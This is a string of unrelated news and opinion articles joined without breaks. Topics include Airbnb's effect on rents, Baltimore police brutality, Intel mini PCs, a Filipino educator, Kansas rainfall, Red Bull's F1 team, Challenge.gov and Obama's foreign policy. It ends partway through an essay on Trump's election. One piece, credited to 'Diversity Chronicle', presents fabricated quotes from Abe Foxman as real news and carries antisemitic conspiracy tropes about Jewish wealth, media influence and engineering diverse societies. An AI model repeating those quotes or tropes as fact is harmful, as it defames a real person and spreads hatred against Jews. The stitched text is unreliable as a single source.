Previous research in cities with tight rental markets has found a link between Airbnb growth and increased housing costs . A study released last year by Keren Horn and Mark Merante found that Airbnb had a direct impact on increased housing prices in Boston . Horn , who is an assistant professor of Economics at the University of Massachusetts , said hers and this new study are two of the first to find a causal relationship between Airbnb listings and housing prices , rather than just a correlation between the two . “ The problem with identifying the impact of Airbnb on rents is that cities are becoming more expensive and at the same time more tourists are coming to visit them , ” Horn said . “ If you just look at these correlations you 'd think they 're moving in the same direction . But is it really Airbnb that 's having a direct effect on rents ? ” In the new study , the researchers scraped the ZIP codes with the greatest number of listings on Airbnb and Zillow . Using data on rental rates and house prices from Zillow , they were able to compare a given ZIP code 's annual Airbnb growth to its annual increase in rental rates and house prices . ( Note that because the study uses data from Zillow , this averages all types of properties for sale , from one-bedroom houses to single family homes , which can vary by ZIP code . ) These small percentage increases have a noticeable dollar impact—especially on neighborhoods popular with tourists . There 's a reason you may have heard more French and German on the sidewalks of Bushwick and Bed-Stuy : the number of Airbnb listings in those central Brooklyn neighborhoods grew by a whopping 41 percent , on average , every year from 2012 to 2016 .
During that same period , rents in these neighborhoods grew about 7.7 percent a year from a baseline average of $ 1,712 per month in 2012—that 's an estimated average increase of $ 131 every year . But not all of that growth is attributable to Airbnb . Controlling for other factors that influence housing costs—such as population growth , income , and employment rates—the findings would suggest that Airbnb was responsible for an estimated $ 27 of this increase . Cities are changing fast . Keep up with the CityLab Daily newsletter . The best way to follow issues you care about . Subscribe Loading ... How might Airbnb increase rents ? Primarily by taking units off the market . In 2015 , seekers of long-term housing in ZIP codes with average growth in Airbnb listings—think of suburban communities like Pleasant Valley , in the Austin , Texas metro—would have found one Airbnb unit for every 13 houses that were vacant-for-rent in their neighborhood . In the ZIP codes that saw the highest relative growth rate of Airbnbs—such as vacation hotspots like Sunset Beach in St. Petersberg , Florida—as much as 50 percent of potentially available homes were placed on Airbnb instead of the long-term rental market . The study , however , finds that two different sorts of Airbnb listings have different impacts . ZIP codes where the majority of landlords are owner-occupiers—those who rent out an extra room or rent for short periods while they are away—experienced minimal increases in housing costs . But ZIP codes with more absentee landlords—those who do not live in the homes they rent out—were especially influenced by increased Airbnb listings . Huntington Beach , California , for example , has a high owner-occupancy rate of 51 percent . Between 2012 and 2016 , Huntington Beach experienced 48 percent growth in Airbnb listings , but rent prices grew only 2.7 percent a year . Hollywood , on the other hand , has a notably low owner-occupancy rate of only 5 percent . In turn , the number of Airbnb listings grew by an average of 50 percent per year , and rent prices grew about 6.4 percent .
“ It has been argued that Airbnb income allows some hosts to stay in their homes in rapidly appreciating housing markets , ” said Edward Kung , one of the study 's authors . But to assess this and other potential economic benefits of Airbnb to communities , he says , there needs to be more research on the home-sharing service , including on the extra income hosts can generate through Airbnb , and how it affects their lives . Airbnb has been the world 's largest home-sharing platform for nearly a decade . Since its founding in 2008 , the company has faced harsh criticism for skirting traditional rental regulations and draining housing supplies in cities where rent prices already soar . The company has taken many of its critics head on : most recently , it started paying hotel tax—as of May 15 , they had paid nearly a quarter of a billion dollars in hotel and tourist taxes globally . This helps the home-sharing service to alleviate some of its impacts , like raised housing costs . The company has also adopted a “ one host , one home ” policy in San Francisco and New York—limiting hosts from listing rentals at more than one address—to account for the uniquely constrained supply of housing in these cities . Some city officials are exploring additional regulation in anticipation of impacts like the one found by this study . Barron , Kung , and Proserpio 's close-up examination of ZIP code-level trends may offer guidance for legislators . Their research suggests that while Airbnb growth is a factor , it is not primarily to blame for shutout rental prices . But how regulators and policymakers attempt to mitigate its effect may differ between neighborhoods . “ They [ Airbnb ] have the advantage of working in lots of cities , ” Horn said . “ They could be a data steward and also a policy proposal steward. ” Horn suggested data-sharing agreements between Airbnb and cities might be key as leaders seek reliable data on where listings are spreading—and where apartments , in turn , might disappear . “ A lot of cities are n't responding well to Airbnb , ” she added , “ that 's definitely not good for them , and maybe it 's not good for the city , either . ”
CORRECTION : A previous version of this story mischaracterized the neighborhoods with the highest relative growth rates of Airbnbs . In those ZIP codes , as much as 50 percent of available homes were placed on Airbnb rather than the long-term rental market .
THE civil unrest in Baltimore in response to the death of Freddie Gray has reignited an old debate about the relationship between culture and poverty . The battle lines have been drawn in the opinion pages of the New York Times . On Friday David Brooks argued that costly big-government efforts to alleviate poverty have n't done much to improve conditions for those living in Sandtown-Winchester , the Baltimore neighbourhood where Mr Gray lived . `` Saying we should just spend more does n't really cut it , '' Mr Brooks writes . `` [ T ] he real barriers to mobility are matters of social psychology , the quality of relationships in a home and a neighbourhood that either encourage or discourage responsibility , future-oriented thinking , and practical ambition . '' Ingrained codes of behaviour have `` dissolved '' , he argues , leaving residents of impoverished areas `` without the norms that middle-class people take for granted . ''
Paul Krugman is very annoyed by this line of thinking , though he does not mention Mr Brooks by name . `` It has been disheartening to see some commentators still writing as if poverty were simply a matter of values , '' Mr Krugman writes , `` as if the poor just mysteriously make bad choices and all would be well if they adopted middle-class values . '' According to Mr Krugman , thinkers like Mr Brooks have it back to front . The decline in values Mr Brooks laments is plainly a response to a hopeless lack of economic opportunity for the working classes . `` [ I ] t should be obvious , '' Mr Krugman avers , `` that middle-class values only flourish in an economy that offers middle-class jobs . ''
Get our daily newsletter Upgrade your inbox and get our Daily Dispatch and Editor 's Picks .
This is an important debate , but it is not the debate to have now .
As much as they bicker , Messrs Krugman and Brooks both agree that just about any occasion can be used to mount a favourite hobbyhorse . Mr Brooks is ever on the lookout for a chance to push the all-important role of culture . Mr Krugman scans the horizon itching to point out `` the devastating effects of extreme and rising inequality '' . Culture and inequality certainly have something to do with the Baltimore riots , but Baltimoreans did not suddenly take to the streets to protest their poverty . They rose up to protest an apparently fresh instance of a very specific pattern of injustice . The Baltimore police are notoriously brutal . According to the Baltimore Sun , the city paid out $ 5.7m between 2011 and 2014 to settle police-brutality suits . The victims have largely been African-American . When Freddie Gray , a black man , died under mysterious circumstances in police custody , it was the last straw .
`` To us , the Baltimore Police Department is a group of terrorists , funded by our tax dollars , who beat on people in our community daily , almost never having to explain or pay for their actions , '' wrote D. Watkins , an essayist and Baltimore native , in an op-ed on April 28th , again in the New York Times . Mr Watkins then offered a number of illustrative anecdotes drawn from personal experience , such as the time when `` a cop clothes-lined a kid named Rick off a moped . Rick hopped up , yelling , 'What did I do ? ' and was instantly clubbed down by the cop and his partner . Rick 's face was badly bruised for weeks . '' Nearly every Baltimorean who took to the streets to protest Gray 's death knows a Rick , or is a Rick . This is the problem .
It is , in fact , a problem of both culture and inequality , but not as Messrs Brooks and Krugman would have it . That is , it is a problem of police culture and inequality under the law . In 2005 more than half of Baltimore 's black men in their twenties were either in prison or on parole , according to one study . This is largely a consequence of tactics in the `` war on drugs '' , including changes in sentencing guidelines , which have disproportionately hurt young black men .
Prosecutors are often reluctant to bring criminal charges against police who brutalise or even kill citizens . It is remarkably difficult to fire an abusive police officer . So it is impressive that Baltimore 's prosecutor charged six officers for Gray 's death , yet their bail is much less than that of a black Baltimore teen who smashed a car window during the protests . If Baltimore had not been burning , those officers might not have been charged at all .
So why are Messrs Brooks and Krugman using the occasion of Baltimore 's protests to squabble over whether values explain material conditions or material conditions explain values ? There 's a soft bigotry—let 's call it the soft bigotry of lazy abstraction—in their indifference to the specifics of Baltimore 's problems . The details matter . When people are literally screaming to be heard , and pundits hear nothing but evidence to support preconceived ideas about what the real problem is , the commentary misses the point .
Messrs Brooks and Krugman should take a cue from their colleague , Ross Douthat , who cared enough about the people of Baltimore to address an issue that actually speaks to their distress . `` After the untimely death of Freddie Gray '' , he wrote on Sunday , `` no issue looms larger than the need to discipline , suspend and fire police officers who do n't belong on the streets—and the obstacles their unions put up to that all-too-necessary process '' . Quite right . One wishes the issue would loom rather larger in his colleagues ' minds , so that they might apply their knack for sniffing out cultural pathology and denouncing the injustice of inequality to problems actually afflicting the people they seem to worry about .
Intel 's successful line of NUC ( Next Unit of Computing ) mini PCs have done well for the company , for various use cases where an ultra-small form factor computer might come in handy . In areas where a PC either needs to stay out of sight , blend in with its surroundings or squeeze in places where other , larger computers just could n't go , a NUC can make a lot of sense . Tiny boxes like the Intel NUC5i5RYK can pack a fair amount of CPU horsepower in their petite , silver 4.5-inch frames , but some users still want more juice and beefier graphics for heavier gaming and content creation workloads.Fortunately , Intel 's process technology and CPU architecture marched on at its typical relentless pace and the company 's new 6th generation Skylake CPU platform now offers a number of performance and feature enhancements , in addition to a CPU and much-needed GPU performance uplift , for the NUC product line .
Cavite City , Philippines ( CNN ) -- Not many people recognized Efren Peñaflorida as he left the Philippines last fall to attend a Hollywood gala for CNN Heroes .
But when Peñaflorida returned from the event as CNN 's Hero of the Year , he was greeted by hundreds of screaming fans at the airport in Manila .
`` The moment we got home , I ... seemed to have become a celebrity , '' he said .
Peñaflorida was honored for creating mobile `` pushcart classrooms , '' carts stocked with books , chalkboards and other supplies , that bring education to poor children in the Philippines . Since 1997 , he and more than 12,000 teenage volunteers have taught basic reading and writing skills to more than 1,800 children living on the streets .
`` The award and the title [ are ] really significant , '' said Peñaflorida , 29 . `` It gave me and my co-volunteers an affirmation that what we are doing is a worthy cause . ''
The plaudits did n't stop there . Back home , parades were arranged in both Manila and Cavite City , where Peñaflorida was born and raised . And then-President Gloria Arroyo conferred him with the Order of Lakandula -- one of the highest honors that can be bestowed upon a Filipino civilian -- for his dedication to the welfare of society .
`` I received the medal but shared the honor with my co-volunteers , my mentor and the children we reach out to , '' he said . `` The government heads received an instruction from the president to have the pushcart schools replicated all over the country . ''
With Peñaflorida 's consultation , the pushcart classroom model started by his nonprofit organization , Dynamic Teen Company , has been replicated more than 50 times by different organizations and institutions across the Philippines . And according to Peñaflorida , more classrooms are pending as President Benigno Aquino 's administration reviews plans to expand the infrastructure of the mobile classroom system .
`` The duplication of the pushcart school system ... is happening now in different provinces and regions of the country , and we receive numerous letters from other parts of the world , '' Peñaflorida said . `` Filipinos have become more aware of the need for these children to be educated , fed and taken care of . Before , they saw [ a pushcart ] as a symbol of poverty , but now they see a pushcart as a symbol of hope and education . ''
In Cavite City , construction is nearly complete on the Dynamic Teen Company 's new educational center , which is designed to resemble the iconic pushcart . Partially funded by the CNN Heroes grant of $ 125,000 , the educational center will include a computer lab , a library , a health clinic , a kitchen used for feeding programs and a garage to store the pushcarts .
`` We will call it Care for Poor Children Learning Center , where children will experience having a place to exercise their rights freely and learn life-changing principles , '' Peñaflorida said . `` It is intended to be finished by early next year ... and [ it ] shall be able to serve hundreds of kids . ''
Peñaflorida says he knows firsthand what these children lack . He spent his childhood in a shanty near a dump site in Cavite City . He founded his organization to provide impoverished children an empowering alternative to gang induction .
`` They need education to be successful in life , '' he said . `` It 's just giving them what others gave to me . ''
Peñaflorida 's selflessness has inspired documentaries and TV movies about his life in the Philippines and several other countries , including Japan , Korea , Germany , Spain and Canada . Recently , he was invited to bear the torch at the first Youth Olympic Games in Singapore . And he can be seen hosting his own search for heroes on the Philippine television show `` Ako Mismo '' ( `` I Myself '' ) . The show features people working in the Philippines to better the lives of others .
`` I was told ... that they came up with this TV show inspired by the speech I gave at the Kodak Theater , that each person has a hidden hero within ... waiting to be unleashed , '' he said . `` Since I was instrumental in the concept , I must live up to the principles I share and help our country find its heroes and probably help our nation heal herself . ''
November 22 will be Efren Peñaflorida Day in Cavite City , but Peñaflorida will likely miss the celebration as he plans to be back in Hollywood honoring this year 's CNN Heroes .
`` They are all awesome , '' he said . `` The works of those 25 souls are so inspiring and truly remarkable . I personally salute them all . ''
The 2010 Top Ten CNN Heroes will be announced Thursday , September 23 at 1 p.m. on CNN.com . At that time , online voting will begin to select the 2010 CNN Hero of the Year . The Hero of the Year will be revealed Thanksgiving night during `` CNN Heroes : An All-Star Tribute , '' hosted by Anderson Cooper at the Shrine Auditorium in Los Angeles , California .
A slow-moving storm system brought several inches of rain to some areas of central and western Kansas on Monday .
In Hutchinson , rainfall reported in a 24-hour period came in at 3.05 inches . Observers with the Community Collaborative Rain , Hail and Snow Network , a grassroots volunteer network of backyard weather observers working in partnership with the National Weather Service , reported at least an inch of rainfall across Reno County .
�The rain wasn�t super heavy , but it lasted and a different type of rain than what we are used to , � said Jerilyn Billings Wright , a meteorologist with the National Weather Service�s Wichita office .
Billings Wright said the largest amounts of rain were in Barton , Ellsworth , McPherson and Rice counties , with 5 inches of rain near Geneseo and Lindsborg , 4.55 inches near Lyons and 4.35 inches near Great Bend . She also said most of central Kansas was in a flood warning Tuesday morning , and more rainfall is in the forecast .
�This was a big rain producer for central Kansas , but it was rain we needed , � said Billings Wright . �A concern is that the ground is saturated , but the rain we get tomorrow could exacerbate the situation.�
A storm system is expected to develop in eastern Colorado and northwest Kansas and reach Reno County by the overnight/early-morning hours and continue on to southeast Kansas on Thursday morning . But Billings Wright said the primary threat from this system looks to be high winds rather than rain .
Larry Ruthi , a meteorologist with the National Weather Service office in Dodge City , said Monday�s rainfall was pretty widespread across western Kansas , which has been helpful for the drought-ridden area .
�We�ve certainly had improvement , but we�re still 3.75 inches below average , � he said .
Ruthi said Ellis County saw the most rainfall for the area , reporting 2 to 4 inches , followed by area of northern Stafford County that reported 3 to 3.5 inches .
Ruthi did say , however , that some pockets in western Kansas still need rain . Elkhart , for instance , is still 50 to 75 percent below average for precipitation .
Ruthi also said temperatures have been below average , precipitation levels have been above average , and the area has been able to stay fairly moist . He does not anticipate a hot/dry period for several weeks .
�I�m certainly happy to see this in June , � he said . �This has been a really welcome change . The cool temperatures have allowed the rain to be more beneficial agriculturally.�
• Reports had stated Gerhard Berger was set to replace Briton • ‘ We know we have problems but we just have to work through them '
The Red Bull principal Christian Horner has shrugged off speculation about his future and said he is determined to stay on to help the troubled Formula One team resolve their problems .
The Times newspaper reported on Tuesday that one of Horner 's rival principals had called him on Sunday morning , before the Austrian Grand Prix , to commiserate about his supposed departure .
The unidentified team principal had been given the impression that the Austrian Gerhard Berger , a former McLaren and Ferrari driver who is close to Red Bull 's billionaire owner Dietrich Mateschitz , was set to replace the Briton .
Nico Rosberg seizes Austrian F1 GP from Lewis Hamilton at first corner Read more
“ I was shocked , ” Horner said . “ I had no idea people were talking about me that way . I have a long contract with the team . It is difficult but I had dinner with Dietrich on Saturday evening and we still get along very well .
“ We know we have problems but we just have to work through them and I am here to do that job . ”
Red Bull , winners of four successive driver and constructor championships between 2010 and 2013 , have yet to feature on the podium this season .
The relationship with under-performing engine partners Renault has been stretched to breaking point while Mateschitz has talked of falling out of love with the sport .
At the Austrian Grand Prix , a home race for Red Bull , the team scored just one point after the Australian Daniel Ricciardo and the Russian Daniil Kvyat collected 10-place grid penalties for engine changes . Red Bull are fourth overall .
Horner said changes needed to be made to enable Renault and Honda to close the gap on champions Mercedes and Ferrari while the rules should be simplified .
However , he added that Mateschitz remained supportive of the sport despite the situation .
“ He 's telling what he thinks . He ultimately is a fan , that 's why he 's committed so much of Red Bull 's marketing activities to Formula One . The risk for Formula One is when someone like Dietrich starts to fall out of love with it , ” said Horner .
“ That 's a big worry because we need people like Dietrich to be engaged . He runs a multinational company and Red Bull does not exist because of Formula One ... if Formula One is n't generating the return and the coverage for him then of course he 's going to raise questions about that . ”
Red Bull run two of the 10 teams in Formula One , with Toro Rosso used to develop junior talent such as the 17-year-old Dutch driver Max Verstappen .
In search of novel solutions to the tricky problem of how to keep astronauts fit during prolonged periods of weightlessness , NASA found an unlikely ally in Alex Altshuler . Altshuler works for a mechanical engineering firm in Foxboro , MA . He had never before responded to a formal government Request for Proposal ( RFP ) , let alone worked with NASA . Yet , the exercise device he designed in response to a NASA challenge constituted a major breakthrough in mitigating the loss of bone and muscle density in astronauts . NASA dubbed the results “ outstanding . ”
Citizen solvers like Altshuler are at the heart of the Obama Administration 's commitment ( pdf ) to increase the use of prizes and challenges to solve tough problems . Prizes allow the government to articulate bold goals – such as building a super-fuel-efficient car , developing a low-cost launch technology for small satellites , or solving the risks to human health that come with space flight – without having to predict which team or approach is most likely to succeed . With a strict focus on results , prizes empower new , untapped talent – like Altshuler – to deliver novel solutions that accelerate innovation .
As of today , it is easier than ever for Federal agencies to mobilize American ingenuity to solve our Nation 's most pressing problems . In a joint keynote presentation at the Gov 2.0 Summit in Washington , U.S. Chief Technology Officer Aneesh Chopra and U.S. Chief Information Officer Vivek Kundra unveiled ( pdf ) Challenge.gov , a one-stop-shop where entrepreneurs , innovators , and citizen solvers can compete for prestige and prizes by providing novel solutions to tough problems , large and small .
Challenge.gov features ( pdf ) over 35 challenges posed by more than 15 government agencies . They range from the Environmental Protection Agency 's Game Day Challenge for the university that best reduces and recycles waste at college football games to a $ 15 million Department of Energy prize for the lighting manufacturer that meets stringent requirements for the next generation of high-quality , high-efficiency light bulbs .
Agriculture Secretary Tom Vilsack used the platform today to announce a new challenge : USDA 's Recipes for Healthy Kids Challenge—part of the First Lady Michelle Obama 's Let 's Move ! Initiative—which invites school nutrition professionals , chefs , students , and parents to develop nutritious , kid-approved foods for school menus . “ The Recipes for Healthy Kids Challenge is an important contribution to our overall efforts to combat childhood obesity , ” the First Lady said in a statement . “ It 's vital that we provide our children with healthy and nutritious food in school and help them learn healthy eating habits that will last a lifetime . ”
These challenges are just a handful of those featured on Challenge.gov and just a taste of what 's to come . By making it simple and free to post challenges , Challenge.gov will accelerate agency adoption of prizes as a means of spurring innovation .
To share your novel solutions , compete for prizes and prestige , and advance our national priorities , visit www.challenge.gov .
Tom Kalil is Deputy Director for Policy in the White House Office of Science and Technology Policy
ADVERTISEMENT
Critics have been belittling President Obama 's recent visit with Latin American leaders as a “ contrition ” and “ apology ” tour . But a more accurate tag would be “ accountability ” tour , and it 's long overdue .
During the Summit of the Americas last week , Obama avoided the hectoring condescension that all too often marked American foreign policy during the Bush years . Instead , he demonstrated that the American case can be made with a combination of humility and accountability . This shift in tone happens to be the best path for improving America 's reputation abroad , and for increasing U.S. influence . In fact , it has already had the effect of reducing tensions with Russia , opening doors for collaboration with alienated allies such as Turkey , and isolating inveterate critics of the United States to the margins of international discourse .
Most controversially , Obama last week met and shook hands with Venezuelan President Hugo Chávez , who continues to consolidate his power and tighten control over Venezuelan civil society . Obama also chose not to answer Nicaraguan President Daniel Ortega 's long tirade against U.S. policy . This has led to accusations that Obama has encouraged authoritarian and left-wing leaders in Latin America while discouraging their political opposition . But such complaints fail to grasp that these leaders have always thrived on demonization by Washington .
What is interesting about Obama 's non-confrontational approach to both leaders is that it suggests Obama has learned not to feed the proverbial trolls . On the one hand , Obama has shown a willingness to engage hostile or critical foreign leaders in discussion . But he has also shown no desire to participate in international polemics , perhaps because he has come to see that the U.S. gains nothing from such confrontations . Better still , by largely ignoring the rantings of anti-American zealots , Obama may be able to split persuadable critics of America from those who are reflexively and genuinely anti-American . In an amusing irony , Obama , who is often accused of being an insubstantial rhetorician , has refrained from the long-winded , idealistic bluster on the international stage that his predecessor frequently indulged in . And it may already be paying dividends .
For instance , one of the regular rituals of Organization of American States gatherings is the litany of complaints about Cuba 's forced absence from the summit . But Obama managed to overshadow those complaints with his previously announced easing of travel restrictions to Cuba . As for his meeting with Chávez , far from embarrassing the U.S. , it highlighted how much Chávez craves American acceptance . ( Chávez tentatively announced the appointment of a new ambassador to Washington , a signal of how isolated Chavez now feels . ) And rather than lending credibility and stature to Ortega , Obama ignored him , which is far worse for an anti-American demagogue than a full-throated rebuttal could ever be .
Most important , Obama 's willingness to acknowledge America 's past tendency to dismiss the views of allies and to disrespect legitimate foreign interests reflects a degree of self-confidence that has been oddly lacking in the strongest advocates of U.S. hegemony . This is especially notable for a Democratic president—since Democratic leaders often feel the need to prove their hawkishness . Instead of the almost-obsessive need to celebrate American achievements , Obama 's handling of foreign relations has shown a steady , humble confidence in the United States . This is a refreshing departure from foreign policy since the end of the Cold War , as well as from some of Obama 's own more aggressive campaign rhetoric . In contrast to that familiar Democratic “ defensive crouch ” on matters of national security , Obama has acted as a leader who feels no need to overcompensate for any perceived weakness and no need to apologize for giving priority to rebuilding damaged international relations with both allies and rivals . Indeed , it seems that the problem Obama 's critics have with him is not that he has been admitting American mistakes , but that he has failed to cringe and apologize to them for pursuing the course of action he thinks best for the United States .
MADISON , Wis. - The University of Wisconsin-Madison plans to replace its required Tonight sexual assault program with a new program in 2017 .
Incoming students are required to take the online Tonight course , which teaches students how to spot , prevent and cope with sexual assault .
`` It helps disrupt common myths and ideas about rape and sexual assault , '' Dr. Sarah Van Orman , executive director of University Health Services , said . `` It helps them be more likely to know what to do , to intervene , it helps them to be able to respond better to a friend or someone they care about who may have experienced a sexual assault . ''
Van Orman said while the course is valuable , there 's room for improvement .
`` We need to upgrade it , we need to improve it , we need to make sure that it 's continually getting better and as successful as possible at achieving what we want it to , '' she said .
Van Orman said university officials have yet to determine what exactly will replace Tonight , or what it will be called , but the school is looking into a variety of options and gathering feedback on what the new program should contain .
`` We 're going to understand the feedback we 're getting from Tonight , both positive and negative , '' Van Orman said . `` ( We 'll ) take a look again at what might be available through commercial products ( and ) work extensively with all our campus community partners . ''
Van Orman said there will be no break period between programs ; students will continue to take the Tonight course until its replacement is developed .
By Ivan Fernando
At a press conference in New York City earlier today , Abe Foxman , head of the Anti-Defamation League , gave a speech announcing the development of a new term , “ Judeophobia ” , intended to replace “ Anti-Semitism , ” the term until recently employed to describe hatred of Jews .
As the conference began , Mr. Foxman noted “ It is unacceptable to compare hatred of Jews with that of any other people . It is unacceptable to compare the persecution of Jews with that of any other people ! No one has suffered as Jews have suffered ! Yet , we still compare the suffering of Jews to non-Jews , when we use the term Anti-Semite to describe someone who , in reality , most likely hates Jews rather than Semites ! ”
In a speech that has divided Jews and progressives , Mr. Foxman went on to say that “ The fact of the matter is , many people who hate Jews , are themselves Semites . Palestinian terrorists are Semitic Jew-haters . Do you realize that , in a broad definition , even Ethiopians can be considered Semites ? Amharic is a Semitic language . Why do we call someone an Anti-Semite , when they really hate Jews ? It is an unsatisfactory term . Additionally , the term trivializes Jewish suffering by possibly including non-Jews within its definition !
I have contacted the United States patent and trademark office , and I have applied for copyright ownership of the terms Judeophobia , Judeophobe and Judeophobic . The best part is , now when someone uses these terms on TV , in a film or a documentary , we can demand a fee ! That is something we could never do before with the word “ Anti-Semite ! ” I am projecting an annual revenue of tens of millions of dollars this year alone , if we implement this important and urgent change in our vocabularies .
I am also extremely proud to announce that through the efforts of the ADL , we have trademarked the term Holocaust with the US patent office , registering the state of Israel as the legal copyright holder . From now on , Israel will hold the legal copyright to the term Holocaust . No longer will anyone be able to degrade Jews or trivialize Jewish suffering by speaking of the ‘ Armenian Holocaust ' or the ‘ Abortion Holocaust ' or other such nonsense . How dare they compare the deaths of six million Jews with the fictional Armenian tragedy ! No longer will anti-abortion extremists be permitted to compare the incalculable suffering of Jews with the termination of unborn fetuses . We hold the official copyright to the term Holocaust . The word belongs to us ! ” Foxman announced to thunderous applause and a standing ovation from the audience .
Some Jewish leaders object to the new term Judeophobia as a replacement for Anti-Semitism . Rabbi Marvin Schlessinger claims that “ The problem with the term Judeophobe , for an Anti-Semite , is that the term implies a fear of Jews , or a phobia . This idea of fearing Jews , may imply that there is cause to fear Jews . In short , ‘ phobe ' , lets off Anti-Semites too easily . It lets them claim to fear us when they are acting upon us with their Anti-Semitism as aggressors . Get it straight , we are the victims . We live in fear of them ! ”
Saul Feinstein of the Simon Wiesenberg Centre , a global Jewish human rights organization founded by Holocaust survivor Eli Wiesenberg , noted that “ We should be very reluctant to adopt a new term replacing Anti-Semitism . We should be very cautious . Remember , all it takes now to silence most critics of Jews or Israel is to accuse them of Anti-Semitism . How do we know that the word Judeophobia will have the same power ? It 's simply too risky . We stand to lose too much after so many gains over the years . ”
After Mr. Foxman 's speech , I spoke with Dr. Norman Frederickson of the Campaign for Equality , Justice and Peace , who was also in attendance . Dr. Frederickson observed that “ While imperfect , the term Anti-Semite , for those who hate Jews , has been adequate in the past . Despite the broadness of the term , it is universally understood to pertain to Jews exclusively . Judeophobe is also a great term for those who hate Jews . I feel both terms are acceptable . We can employ diverse terms to describe those who hate all Jews . ”
After speaking with Dr. Frederickson , I was able to sit down with Abe Foxman , who was extremely busy , for a discussion . I observed that historically , much Judeophobia derived from the erroneous notion that Jews somehow killed Jesus Christ or instigated his death . However , despite declining church attendance , Judeophobia continues to grow at alarming rates . Judeophobes continue to offer thoroughly irrational theories of their own to explain the phenomenon .
I expressed my concern to Mr. Foxman that in recent years , we have also witnessed the ugly rise of Jew-hatred among so-called liberals or progressives . These vile two-faced individuals often feign concern about alleged unjust or inequitable treatment of Palestinians by the State of Israel , as a means of expressing their very real hatred of Jews and latent white-supremacist attitudes ! In reality , Israel has the most exemplary human rights record of any nation . In fact , Israeli leaders , and Jews in general , have been disproportionately represented among recipients of the Nobel Peace Prize !
After enjoying more than one glass of delicious Mogen David red wine together , I asked Abe Foxman why Judeophobia seems to be growing by leaps and bounds around the world today . He replied “ Ivan , because you are a dear friend and supporter , I am going to be more candid than usual . I probably should n't say this , but here it goes . Many people have wrestled with the question of the origin of Anti-Semitism , I mean Judeophobia . Personally , I believe its jealousy . Why ? because Jews are morally superior to white people ! Owing to our abilities , Jews make up half of all the billionaires in the US . As Vice-President Joe Biden recently pointed out , through media influence , Jews are at the forefront of efforts to promote the acceptance of gays and lesbians as well as gay marriage , feminism , and the Civil Rights Movement . Unfortunately , those who hate progress use this against us .
Naturally , racist white reactionaries resent Jewish leaders , and Jews in general for taking this leading role as the conscience of society and for their principled progressive stands . In short , Jews suffer because of their innate goodness . We suffer to ennoble society ! Our primary mission at the ADL of course is , and must be to protect Jews everywhere , and without a doubt , protecting diversity is good for Jews ! We do n't want another Hitler to come along ! That 's why this work is so important . Because of our history , we have a duty and a responsibility to foster multi-culturalism and tolerance !
The safest kind of society for Jews is a divided , excuse me , a diverse one . A Hitler could never come to power in a state that is multi-racial , with no clear group as a majority . One that has a strong Civil-Rights movement , a progressive immigration policy , and a strong feminist and gay rights movement . One that educated the public about the negative role of whites through history , so that they do n't get out of hand . My goal is a world where it is safe to be a Jew . No one has been more persecuted or suffered more than Jews !
The simple fact is , when Jews are wealthy or successful , It 's owing to hard work , shrewdness and self-sacrifice . When whites in the US or Europe are successful , it is because they are exploiting the poor and the underclass . They are preying upon them and oppressing them . Why ca n't people understand the difference ? All too often successful whites are motivated by avarice and greed . By contrast Jews are primarily motivated by a desire to bring about a better and more equitable world , through Tikkun Olam. ” Mr. Foxman observed .
I stood in awe , as I admired the wisdom of this great man . I note with great sadness that Abe Foxman will be retiring next year . I can not think of another contemporary Jewish leader who has done more to advance Tikkun Olam ( The Jewish concept of repairing the world ) than he has . Mazel Tov , my friend , on your retirement ! As I learned in a recent class on Kabbalah , and as I can personally attest , there is a spark of divinity in this man . Abe Foxman is part of God Himself , as the Zohar teaches , and that explains in part his great works and wisdom .
Copyright © 2014 Diversity Chronicle All Rights Reserved .
Advertisements
The United States has the highest number of students pursuing higher education on its land . This is according to the 2009 Open Doors Report which is considered to be the most important and comprehensive on international students studying in various American Universities . This clearly proves the efforts of the Department of Homeland Security with their Open Doors Policy which has maintained the borders yet attracted many to come to the United States .
This clearly proves the balance that is maintained between attracting visitors yet securing a stringent policy on its boundaries . In addition , the partnership between the Immigration and Costumer Enforcement and the academic community has shown positive results with a substantial rise in the number of foreign students coming to the United States .
This is especially true for the last three years in a row . Such significant rise has been experienced the first time after 1980 . At present , there are more than 670,000 foreign students studying in the United States .
In 2003 , a web based Student and Exchange Visitor Information System ( SEVIS ) was started by the US Immigration and Customs Enforcement . Through this system , all the records of the students , exchange visitors and other dependents are efficiently managed during their residence in the United States . This has led to the correct numbering of students entering the country and thus , keeping a track of it at all times .
On the other hand , it also proves the standards of education offered in the United States to be at par with the rest of the world . Thus , many students prefer to come and study here . With this , the country is also one of the developed nations in the world offering state of the art facilities . What more does one require ?
And now we have Donald Trump . We have small-town inland America—the culture I think of myself as being from—being credited or blamed for making a man like this the 45th in a sequence that includes Washington , Lincoln , and FDR . I view Trump 's election as the most grievous blow that the American idea has suffered in my lifetime . The Kennedy and King assassinations and the 9/11 attacks were crimes and tragedies . The wars in Vietnam and Iraq were disastrous mistakes . But the country recovered . For a democratic process to elevate a man expressing total disregard for democratic norms and institutions is worse . The American republic is based on rules but has always depended for its survival on norms—standards of behavior , conduct toward fellow citizens and especially critics and opponents that is decent beyond what the letter of the law dictates . Trump disdains them all . The American leaders I revere are sure enough of themselves to be modest , strong enough to entertain self-doubt . When I think of Republican Party civic virtues , I think of Eisenhower . But voters , or enough of them , have chosen Trump .
How could this have happened ? No one can know for sure , and with an event this complex and contingent—why not more visits to Wisconsin ? what about Comey ? and the Russians ? —there will be no single explanation . But I disagree with two elements of instant analysis : that this was a sweeping “ change ” election , and that it reflected a pent-up desperation and fury that would have been evident if anyone had bothered to check with Americans “ out there , ” away from the coasts .
In its calamitous effects—for climate change , in what might happen in a nuclear standoff , for race relations—this could indeed be as consequential a “ change ” election as the United States has had since 1860 . But nothing about the voting patterns suggests that much of the population intended upheaval on this scale . “ Change ” elections drive waves of incumbents from office . This time only two senators , both Republicans , lost their seats . Of the nearly 400 representatives running for reelection to the House , only eight lost , six of them Republicans and two Democrats . In change elections , the incumbent president and his party are out of favor , even reviled : Hoover after the start of the Great Depression , George W. Bush after the financial crash . Through 2016 , Barack Obama 's popularity kept rising , and if he could have run again , he would have been a favorite for reelection . But even the much less popular candidate from his same party comfortably won the popular vote , and the Democrats gained seats in both the Senate and the House . This is not what 1932 looked like , or 1980 , or 2008 .
